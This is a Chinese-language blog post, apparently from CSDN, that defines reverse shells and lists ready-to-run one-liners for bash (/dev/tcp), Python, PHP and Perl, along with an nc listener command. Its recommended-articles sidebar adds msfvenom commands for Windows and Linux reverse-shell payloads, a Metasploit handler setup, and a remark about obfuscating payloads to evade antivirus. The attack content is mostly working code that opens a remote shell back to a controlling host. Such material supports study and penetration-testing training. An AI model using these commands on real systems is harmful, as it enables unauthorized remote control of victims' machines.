反弹shell的使用

最新推荐文章于 2024-08-30 09:08:38 发布
原创 最新推荐文章于 2024-08-30 09:08:38 发布 · 289 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#shell #linux #bash

部署运行你感兴趣的模型镜像

反弹shell

反弹shell,是指从受害者的机器上主动连接到指定的机器上的可交且能执行命令的TCP进程。反弹shell的前提是受害者的
机器上有命令执行的漏洞。常见的一句话反弹shell,如下:

  • bash 反弹shell
bash -i >& /dev/tcp/127.0.0.1/9999 0>&1 2>&1

参数解释:
bash -i:产生一个bash的交互环境
“>&”:将联合符号前面的内容与后面的内容相结合然后一起重定向给后者,将标准输入0和标准出错2重定向到标准输出

  • python 反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",portn));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • php 反弹shell
php -r '$sock=fsockopen("x.x.x.x",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
  • perl 反弹shell
perl -e 'use Socket;$i="192.168.31.41";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

服务端开启监听服务

nc -lvp 9999 
-l:listening  the port
v:列出详细信息
p:端口

您可能感兴趣的与本文相关的镜像

Python3.9

Python3.9

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

反弹shell初识
无痕的博客
11-01 4518
反弹shell的指令与演示
简单易懂!反弹shell使用流程
weixin_54475173的博客
01-02 893
反弹shell使用流程,简单易上手
为什么要反弹shell
m0_55306747的博客
05-28 569
我也不知道这个比喻恰不恰当: 首先是一个城池,我想要控制这个城,就要控制这个城的城主,我手里有控制当前城主的把柄(shell) 但是我要和城主建立起联系才可以控制他,城外有一座大墙(防火墙),会严格检查入城的人(流量审查),所以我不能入城,一旦入城,城里的人可能会发现异样,将城主换掉(打补丁) 不过好在我发现这个城有一个后门,我虽然进不去,但是我把信送进去了,我不去找他,我让城主来找我,我在信上写了我的地址(ip和端口),然后我在预定的位置等待城主的到来(端口监听) 因为城主是城主出城,当然那个大墙
反弹shell
m0_51632271的博客
01-25 1133
反弹shell 学习笔记 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发器请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 持久化控制,通过每隔一段时间执行反弹shell即可获取持久化控制。 端口使用不固定。(尽量找一些不常用的端口。) nc -lnvp 12345 #服务端开启监听12345端口 bash -i >& /d
反弹shell的原理以及应用
zkaqlaoniao的博客
04-19 1239
反弹shell(reverse shell),指的就是我们的机器监听在某TCP/UDP端口,然后在希望被我们利用的被控机器发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell其实差不多对应,本质上是网络概念的客户端与服务端的角色反转。
什么是反弹 Shell
sixqingfeng的博客
07-12 938
前段时间被一位产品经理嘲笑了,说我居然连反弹 Shell 都不知道说实话当时我还真不知道,但这口气咽不下去啊,得赶紧学来看看,这不,我已经学会了学完之后我特地来记录下,同时分享给大家,以后产品经理再也不敢嘲笑我们不懂反弹 Shell 了我们都知道 Shell 的概念吧,简单来说,Shell 就是实现用户命令的接口,通过这个接口我们就能实现对计算机的控制,比如我们常见的 ssh 就是执行的 Shell 命令实现对远程对服务器的控制那反弹 Shell 是啥呢?其英文名叫做 Reverse Shell,具体干什么
FastJson远程代码执行漏洞基于JNDI反弹shell使用
hapenl的博客
10-13 6483
在FastJson组件1.2.24及之前版本存在远程代码执行漏洞(CVE-2017-18349)。本文讲解的是基于JNDI的反弹shell操作。
反弹shell流量分析与检测
欢迎光临
08-30 1739
常用的隧道技术:网络层:ipv6、Icmp、greIPv6隧道:将ipv6报文放入ipv4作为载体进行传输,工具:socat、6tunnelICMP隧道:将数据放入ping包中进行传输,工具:icmpsh、PingTunnelGRE隧道传输层:TCP隧道、UDP隧道、常规的端口转发。端口转发:没有端口限制就正常的内网端口转发,有端口限制就本地端口转发 工具:lcx、nc、powercatSOCKS代理:SOCKS代理可以理解为增强版的lcx。
安全攻防渗透测试一键生成反弹shell自动化工具
12-20
1. 授人以鱼不如授人以渔:本压缩包提供源码,可二次开发,也可不断自行补充新的反弹shell。 2. 傻瓜式操作:仅需双击exe文件或直接运行源码启动程序,输入反弹的ip和port,就能一键生成各类反弹shell 3. 界面清爽易...
网络安全基础入门反弹SHELL与正反向连接技术:防火墙绕过及文件下载命令详解
04-22
内容概要:本文档主要介绍了基础入门级别的反弹SHELL、不回显带外、正反向连接、防火墙出入站规则以及文件下载等技术。涵盖Web常规、Web其他、Web拓展、APP架构、小程序架构等方面的知识点。详细讲解了渗透命令如...
shell反弹理解
3569
11-22 1175
http://www.freebuf.com/articles/system/153986.htm 那么这个反弹shell命令到底是什么意思呢 bash -i >&/dev/tcp/192.168.190.138/6666 0>&1  对于速食主义者,后面的内容可以选择忽略 命令 解释 ba
关于反弹shell的理解
weixin_42151709的博客
03-22 994
想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹。 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。 那么什么情况下正向连接不太好用了呢? 1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。它的ip会动态改变,你不能持续控...
Linux反弹shell姿势总结(转载)
forest_tree的博客
08-20 356
Linux反弹shell Bash反弹shell nc反弹shell python反弹shell php反弹shell 使用php的exec函数反弹shell 使用php的fsockopen远程连接 Perl反弹shell Ruby反弹shell Java反弹shell 其他反弹shell姿势 Linux反弹shell场景非常常见,常用于目标主机反弹shell给攻击机。 攻击机监听相应端口,目标机执行反弹shell,getshellBash反弹shell 目标机: bash -i >& /
反弹shell利用方式
07-29 605
反弹shell 1.bash反弹 攻击机监听端口 netcat: nc -nvlp 4444 -n: 不反向解析dns,即不通过ip解析域名 no dns -v: 详细信息输出 verbose -l: 监听 listen -p: 指定端口 port 靶机执行shell命令 bash -i >& /dev/tcp/攻击...
反弹shell,一篇概括
m0_63733486的博客
06-17 827
在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。
linux反弹shell命令解析
原味瓜子、的博客
09-29 2397
文章目录1. 什么是反弹shell2. 反弹shell的用途3. 反弹shell操作步骤4. 原理 1. 什么是反弹shell 简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。 2. 反弹shell的用途 这个反弹shell大部分用途是用来侵入别人的主机。就是因为感觉很厉害的样子,所以才来研究这家伙 3. 反弹shell操作步骤 3.1. 在本机开启端口9090 nc -lk 9090 3.2. 在需要被控制的机器上执行如下两种命令中的一种即可 bash -i >& /
反弹shell总结
weixin_51692662的博客
11-10 1234
反弹shell
Linux反弹Shell的多种技巧
安心写bug的博客
08-10 1455
反弹Shell(Reverse Shell)主要用来实现反向连接,突破防火墙限制、权限不足、端口限制、动态IP、内网NAT等情况,这些限制使得传统的正向连接(如SSH、Telnet等)难以实现。
反弹shell的方法总结(base64绕过等等)
热门推荐
weixin_50464560的博客
04-01 1万+
前言 什么是反弹shell(reverse shell)? 就是控制端监听某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么需要反弹shell反弹shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形。在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。以下详细介绍Win
使用msf生成反弹shell
最新发布
05-29
### 使用 Metasploit 框架生成反弹 Shell 的 Payload Metasploit 是一个强大的渗透测试框架,提供了多种模块和工具用于生成后门以及模拟安全攻击。以下详细介绍了如何使用 `msfvenom` 工具生成反弹 Shell 的 Payload。 #### 生成 Windows 系统的反弹 Shell Payload 对于 Windows 系统,可以生成一个带有 Meterpreter 会话的可执行文件(`.exe`)。以下是生成命令的示例: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP地址 LPORT=目标端口 -f exe -o shell.exe ``` 这条命令的作用是生成一个基于 `windows/meterpreter/reverse_tcp` 的 Payload,其中 `-p` 指定 Payload 类型,`LHOST` 是本地监听的 IP 地址,`LPORT` 是本地监听的端口号,`-f exe` 表示输出格式为可执行文件,`-o shell.exe` 指定输出文件名[^3]。 #### 生成 Linux 系统的反弹 Shell Payload 对于 Linux 系统,可以生成一个基于 Bash 或 Python 的 Payload。以下是生成 Bash 脚本的示例: ```bash msfvenom -p cmd/unix/reverse_bash LHOST=你的IP地址 LPORT=目标端口 -f raw -o shell.sh ``` 此命令生成了一个基于 `cmd/unix/reverse_bash` 的 Payload,适用于 Unix/Linux 系统。输出格式为原始数据流(`raw`),并保存为脚本文件 `shell.sh`[^4]。 #### 配置 Metasploit Framework 监听器 生成 Payload 后,需要在 Metasploit 中配置监听器以接收反弹连接。以下是配置监听器的步骤: 1. 启动 Metasploit Console。 2. 使用以下命令加载相应的 Exploit 模块: ```bash use exploit/multi/handler ``` 3. 设置 Payload 类型与生成时一致: ```bash set payload windows/meterpreter/reverse_tcp ``` 4. 设置监听 IP 和端口: ```bash set lhost 你的IP地址 set lport 目标端口 ``` 5. 开始监听: ```bash exploit ``` 当目标系统运行生成的 Payload 时,Metasploit 将捕获反弹连接并提供交互式 Shell。 #### 注意事项 在进行渗透测试或学习时,必须确保拥有合法授权。未经授权的使用可能违反法律。此外,生成的 Payload 可能会被防病毒软件检测到,因此需要考虑 Payload 的混淆或编码技术以提高成功率[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值